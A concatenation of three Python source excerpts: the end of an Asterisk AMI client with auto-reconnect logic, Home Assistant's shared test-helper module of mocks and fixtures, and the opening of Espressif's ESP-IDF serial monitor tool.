self._fire_on_disconnect(error=e)
try:
while not self.finished.is_set():
pack = next(pack_generator)
self.fire_recv_pack(pack)
self._fire_on_disconnect(error=None)
except Exception as ex:
_logger.info("Got Exception: %s", ex)
self._fire_on_disconnect(error=ex)
def fire_recv_reponse(self, response):
self._fire_on_response(response=response)
if response.status.lower() == 'goodbye':
self.finished.set()
if 'ActionID' not in response.keys:
return
action_id = response.keys['ActionID']
if action_id not in self._futures:
return
future = self._futures.pop(action_id)
future.response = response
def fire_recv_event(self, event):
self._fire_on_event(event=event)
for listener in self._event_listeners:
listener(event=event, source=self)
def fire_recv_pack(self, pack):
if Response.match(pack):
response = Response.read(pack)
self.fire_recv_reponse(response)
return
if Event.match(pack):
event = Event.read(pack)
self.fire_recv_event(event)
return
self._fire_on_unknown(pack=pack)
def add_listener(self, listener=None, **kwargs):
if not listener:
default = NOOP_LISTENER.copy()
default.update(kwargs)
listener = AMIClientListener(**default)
self._listeners.append(listener)
return listener
def remove_listener(self, listener):
self._listeners.remove(listener)
return listener
def add_event_listener(self, on_event=None, **kwargs):
if len(kwargs) > 0 and not isinstance(on_event, EventListener):
event_listener = EventListener(on_event=on_event, **kwargs)
else:
event_listener = on_event
self._event_listeners.append(event_listener)
return event_listener
def remove_event_listener(self, event_listener):
self._event_listeners.remove(event_listener)
class AMIClientAdapter(object):
def __init__(self, ami_client):
self._ami_client = ami_client
def _action(self, name, _callback=None, variables={}, **kwargs):
action = Action(name, kwargs)
action.variables = variables
return self._ami_client.send_action(action, _callback)
def __getattr__(self, item):
return partial(self._action, item)
class AutoReconnect(threading.Thread):
def __init__(self, ami_client, delay=0.5,
on_disconnect=lambda *args: None, on_reconnect=lambda *args: None):
super(AutoReconnect, self).__init__()
self.on_reconnect = on_reconnect
self.on_disconnect = on_disconnect
self.delay = delay
self.finished = None
self._ami_client = ami_client
self._login_args = None
self._login = None
self._logoff = None
self._prepare_client()
def _prepare_client(self):
self._login = self._ami_client.login
self._logoff = self._ami_client.logoff
self._ami_client.login = self._login_wrapper
self._ami_client.logoff = self._logoff_wrapper
def _rollback_client(self):
self._ami_client.login = self._login
self._ami_client.logoff = self._logoff
def _login_wrapper(self, *args, **kwargs):
callback = kwargs.pop('callback', None) or (lambda *a, **k: None)
def on_login(response, *a, **k):
if not response.is_error():
if self._login_args is None:
self.finished = threading.Event()
self.start()
self._login_args = (args, kwargs)
callback(response, *a, **k)
kwargs['callback'] = on_login
return self._login(*args, **kwargs)
def _logoff_wrapper(self, *args, **kwargs):
self.finished.set()
self._rollback_client()
return self._logoff(*args, **kwargs)
def ping(self):
try:
f = self._ami_client.send_action(Action('Ping'))
response = f.response
if response is not None and not response.is_error():
_logger.info("PING success")
return True
_logger.error("PING failed")
self._ami_client.disconnect()
self.on_disconnect(self._ami_client, response)
except Exception as ex:
_logger.error("PING failed. %s", ex)
self._ami_client.disconnect()
self.on_disconnect(self._ami_client, ex)
return False
def try_reconnect(self):
try:
f = self._login(*self._login_args[0], **self._login_args[1])
response = f.response
if response is not None and not response.is_error():
self.on_reconnect(self._ami_client, response)
return True
except:
pass
return False
def run(self):
self.finished.wait(self.delay)
while not self.finished.is_set():
if not self.ping():
self.try_reconnect()
self.finished.wait(self.delay)
def __del__(self):
self._rollback_client()
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
import collections
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import sys
import threading
import time
import uuid
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
_async_get_device_automations as async_get_device_automations,
)
from homeassistant.components.mqtt.models import Message
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED,
ATTR_SERVICE,
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_PLATFORM_DISCOVERED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.yaml.loader as yaml_loader
from tests.async_mock import AsyncMock, Mock, patch
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
fut = asyncio.Future()
fut.set_result(None)
return fut
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone("US/Pacific")
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = Message(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, datetime_):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})
for task in list(hass.loop._scheduled):
if not isinstance(task, asyncio.TimerHandle):
continue
if task.cancelled():
continue
future_seconds = task.when() - hass.loop.time()
mock_seconds_into_future = datetime_.timestamp() - time.time()
if mock_seconds_into_future >= future_seconds:
task._run()
task.cancel()
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
@ha.callback
def async_fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.async_fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path, encoding="utf-8") as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {"entity_id": new_state.entity_id, "new_state": new_state}
if old_state:
event_data["old_state"] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError(f"Integration {component} is already setup")
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or OrderedDict()
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
def mock_area_registry(hass, mock_entries=None):
"""Mock the Area Registry."""
registry = area_registry.AreaRegistry(hass)
registry.areas = mock_entries or OrderedDict()
hass.data[area_registry.DATA_REGISTRY] = registry
return registry
def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
"""Mock the Device Registry."""
registry = device_registry.DeviceRegistry(hass)
registry.devices = mock_entries or OrderedDict()
registry.deleted_devices = mock_deleted_entries or OrderedDict()
hass.data[device_registry.DATA_REGISTRY] = registry
return registry
class MockGroup(auth_models.Group):
"""Mock a group in Home Assistant."""
def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY):
"""Mock a group."""
kwargs = {"name": name, "policy": policy}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._groups[self.id] = self
return self
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(
self,
id=None,
is_owner=False,
is_active=True,
name="Mock User",
system_generated=False,
groups=None,
):
"""Initialize mock user."""
kwargs = {
"is_owner": is_owner,
"is_active": is_active,
"name": name,
"system_generated": system_generated,
"groups": groups or [],
"perm_lookup": None,
}
if id is not None:
kwargs["id"] = id
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
def mock_policy(self, policy):
"""Mock a policy for a user."""
self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup)
async def register_auth_provider(hass, config):
"""Register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config
)
assert provider is not None, "Invalid config specified"
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError("Provider already registered")
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._set_defaults()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(
self,
domain=None,
dependencies=None,
setup=None,
requirements=None,
config_schema=None,
platform_schema=None,
platform_schema_base=None,
async_setup=None,
async_setup_entry=None,
async_unload_entry=None,
async_migrate_entry=None,
async_remove_entry=None,
partial_manifest=None,
):
"""Initialize the mock module."""
self.__name__ = f"homeassistant.components.{domain}"
self.__file__ = f"homeassistant/components/{domain}"
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
# Overlay to be used when generating manifest from this module
self._partial_manifest = partial_manifest
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if platform_schema_base is not None:
self.PLATFORM_SCHEMA_BASE = platform_schema_base
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = AsyncMock(return_value=True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
if async_migrate_entry is not None:
self.async_migrate_entry = async_migrate_entry
if async_remove_entry is not None:
self.async_remove_entry = async_remove_entry
def mock_manifest(self):
"""Generate a mock manifest to represent this module."""
return {
**loader.manifest_from_legacy_module(self.DOMAIN, self),
**(self._partial_manifest or {}),
}
class MockPlatform:
"""Provide a fake platform."""
__name__ = "homeassistant.components.light.bla"
__file__ = "homeassistant/components/blah/light"
# pylint: disable=invalid-name
def __init__(
self,
setup_platform=None,
dependencies=None,
platform_schema=None,
async_setup_platform=None,
async_setup_entry=None,
scan_interval=None,
):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = AsyncMock(return_value=None)
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self,
hass,
logger=None,
domain="test_domain",
platform_name="test_platform",
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger("homeassistant.helpers.entity_platform")
# Otherwise the constructor will blow up.
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
)
class MockToggleEntity(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state, unique_id=None):
"""Initialize the mock entity."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the entity if any."""
self.calls.append(("name", {}))
return self._name
@property
def state(self):
"""Return the state of the entity if any."""
self.calls.append(("state", {}))
return self._state
@property
def is_on(self):
"""Return true if entity is on."""
self.calls.append(("is_on", {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the entity on."""
self.calls.append(("turn_on", kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the entity off."""
self.calls.append(("turn_off", kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls) if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(
self,
*,
domain="test",
data=None,
version=1,
entry_id=None,
source=config_entries.SOURCE_USER,
title="Mock Title",
state=None,
options={},
system_options={},
connection_class=config_entries.CONN_CLASS_UNKNOWN,
unique_id=None,
):
"""Initialize a mock config entry."""
kwargs = {
"entry_id": entry_id or uuid.uuid4().hex,
"domain": domain,
"data": data or {},
"system_options": system_options,
"options": options,
"version": version,
"title": title,
"connection_class": connection_class,
"unique_id": unique_id,
}
if source is not None:
kwargs["source"] = source
if state is not None:
kwargs["state"] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, "name", fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, "name", fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if "homeassistant/components" in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding="utf-8")
# Not found
raise FileNotFoundError(f"File not found: {fname}")
return patch.object(yaml_loader, "open", mock_open_f, create=True)
def mock_coro(return_value=None, exception=None):
"""Return a coro that returns a value or raise an exception."""
fut = asyncio.Future()
if exception is not None:
fut.set_exception(exception)
else:
fut.set_result(return_value)
return fut
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
async def mock_psc(hass, config_input, integration):
"""Mock the prepare_setup_component to capture config."""
domain_input = integration.domain
res = await async_process_component_config(hass, config_input, integration)
config[domain_input] = None if res is None else res.get(domain_input)
_LOGGER.debug(
"Configuration for %s, Validated: %s, Original %s",
domain_input,
config[domain_input],
config_input.get(domain_input),
)
return res
assert isinstance(config, dict)
with patch("homeassistant.config.async_process_component_config", mock_psc):
yield config
if domain is None:
assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format(
list(config.keys())
)
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert (
res_len == count
), f"setup_component failed, expected {count} got {res_len}: {res}"
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB
with patch("homeassistant.components.recorder.migration.migrate_schema"):
assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_STATE_TASK
data = restore_state.RestoreStateData(hass)
now = date_util.utcnow()
last_states = {}
for state in states:
restored_state = state.as_dict()
restored_state["attributes"] = json.loads(
json.dumps(restored_state["attributes"], cls=JSONEncoder)
)
last_states[state.entity_id] = restore_state.StoredState(
State.from_dict(restored_state), now
)
data.last_states = last_states
_LOGGER.debug("Restore cache: %s", data.last_states)
assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}"
async def get_restore_state_data() -> restore_state.RestoreStateData:
return data
# Patch the singleton task in hass.data to return our new RestoreStateData
hass.data[key] = hass.async_create_task(get_restore_state_data())
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if "entity_id" in values:
self.entity_id = values["entity_id"]
@property
def name(self):
"""Return the name of the entity."""
return self._handle("name")
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle("should_poll")
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle("unique_id")
@property
def state(self):
"""Return the state of the entity."""
return self._handle("state")
@property
def available(self):
"""Return True if entity is available."""
return self._handle("available")
@property
def device_info(self):
"""Info how it links to a device."""
return self._handle("device_info")
@property
def device_class(self):
"""Info how device should be classified."""
return self._handle("device_class")
@property
def unit_of_measurement(self):
"""Info on the units the entity state is in."""
return self._handle("unit_of_measurement")
@property
def capability_attributes(self):
"""Info about capabilities."""
return self._handle("capability_attributes")
@property
def supported_features(self):
"""Info about supported features."""
return self._handle("supported_features")
@property
def entity_registry_enabled_default(self):
"""Return if the entity should be enabled when first added to the entity registry."""
return self._handle("entity_registry_enabled_default")
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if "data" not in mock_data or "version" not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info("Loading data for %s: %s", store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
_LOGGER.info("Writing data to %s: %s", store.key, data_to_write)
# To ensure that the data can be serialized
data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder))
async def mock_remove(store):
"""Remove data."""
data.pop(store.key, None)
with patch(
"homeassistant.helpers.storage.Store._async_load",
side_effect=mock_async_load,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store._write_data",
side_effect=mock_write_data,
autospec=True,
), patch(
"homeassistant.helpers.storage.Store.async_remove",
side_effect=mock_remove,
autospec=True,
):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
store._async_cleanup_final_write_listener()
store._async_cleanup_delay_listener()
await store._async_handle_write_data()
async def get_system_health_info(hass, domain):
"""Get system health info."""
return await hass.data["system_health"]["info"][domain](hass)
def mock_integration(hass, module):
"""Mock an integration."""
integration = loader.Integration(
hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest()
)
_LOGGER.info("Adding mock integration: %s", module.DOMAIN)
hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration
hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module
return integration
def mock_entity_platform(hass, platform_path, module):
"""Mock a entity platform.
platform_path is in form light.hue. Will create platform
hue.light.
"""
domain, platform_name = platform_path.split(".")
mock_platform(hass, f"{platform_name}.{domain}", module)
def mock_platform(hass, platform_path, module=None):
"""Mock a platform.
platform_path is in form hue.config_flow.
"""
domain, platform_name = platform_path.split(".")
integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {})
module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {})
if domain not in integration_cache:
mock_integration(hass, MockModule(domain))
_LOGGER.info("Adding mock integration platform: %s", platform_path)
module_cache[platform_path] = module or Mock()
def async_capture_events(hass, event_name):
"""Create a helper that captures events."""
events = []
@ha.callback
def capture_events(event):
events.append(event)
hass.bus.async_listen(event_name, capture_events)
return events
@ha.callback
def async_mock_signal(hass, signal):
"""Catch all dispatches to a signal."""
calls = []
@ha.callback
def mock_signal_handler(*args):
"""Mock service call."""
calls.append(args)
hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler)
return calls
class hashdict(dict):
"""
hashable dict implementation, suitable for use as a key into other dicts.
>>> h1 = hashdict({"apples": 1, "bananas":2})
>>> h2 = hashdict({"bananas": 3, "mangoes": 5})
>>> h1+h2
hashdict(apples=1, bananas=3, mangoes=5)
>>> d1 = {}
>>> d1[h1] = "salad"
>>> d1[h1]
'salad'
>>> d1[h2]
Traceback (most recent call last):
...
KeyError: hashdict(bananas=3, mangoes=5)
based on answers from
http://stackoverflow.com/questions/1151658/python-hashable-dicts
"""
def __key(self):
return tuple(sorted(self.items()))
def __repr__(self): # noqa: D105 no docstring
return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key())
def __hash__(self): # noqa: D105 no docstring
return hash(self.__key())
def __setitem__(self, key, value): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def __delitem__(self, key): # noqa: D105 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def clear(self): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def pop(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def popitem(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def setdefault(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
def update(self, *args, **kwargs): # noqa: D102 no docstring
raise TypeError(f"{self.__class__.__name__} does not support item assignment")
# update is not ok because it mutates the object
# __add__ is ok because it creates a new object
# while the new object is under construction, it's ok to mutate it
def __add__(self, right): # noqa: D105 no docstring
result = hashdict(self)
dict.update(result, right)
return result
def assert_lists_same(a, b):
"""Compare two lists, ignoring order."""
assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
[hashdict(i) for i in b]
)
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make (or idf.py) flash" (Ctrl-T Ctrl-F)
# - Run "make (or idf.py) app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
from __future__ import unicode_literals
from builtins import chr
from builtins import object
from builtins import bytes
import subprocess
import argparse
import codecs
import datetime
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import shlex
import time
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
from io import open
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_L = '\x0c'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be udpated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
# regex matches an potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
